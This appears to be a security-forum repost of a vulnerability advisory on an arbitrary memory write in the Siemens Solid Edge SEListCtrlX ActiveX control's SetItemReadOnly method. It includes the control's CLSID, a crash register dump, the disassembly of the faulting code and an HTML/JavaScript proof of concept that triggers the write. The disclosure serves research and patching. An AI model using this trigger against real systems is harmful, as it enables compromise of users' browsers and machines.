Jump to content
snakeO2

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rew

By snakeO2, in Exploituri

Recommended Posts

snakeO2 Newbie

snakeO2

Posted
Posted 

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly 
Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

file tested: SolidEdgeV104ENGLISH_32Bit.exe


background:

the mentioned software installs an ActiveX control with
the following settings:

ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Vulnerability:

This control exposes the SetItemReadOnly() method, see typelib:

...
/* DISPID=14 */
    function SetItemReadOnly(
        /* VT_VARIANT [12]  */ $hItem,
        /* VT_BOOL [11]  */ $bReadOnly
        )
    {
    }
...

(i)
By setting to a memory address the first argument
and the second one to 'false' you can write a NULL
byte inside an arbitrary memory region.

(ii)
By setting to a memory address the first argument
and the second one to 'true' you can write a \x08
byte inside an arbitrary memory region.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618



vulnerable code, inside the close control.dll:
...
;------------------------------------------------------------------------------
        Align   4
 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
        push    ebp
        mov ebp,esp
        mov eax,[ebp+08h]
        test    eax,eax
        jz  L1011D15C
        cmp dword ptr [ebp+0Ch],00000000h
        jz  L1011D158
        or  dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...

...
;------------------------------------------------------------------------------
 L1011D158:
        and dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here          
 L1011D15C:
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...

As attachment, code to reproduce the crash.



<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>

Sursa: SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...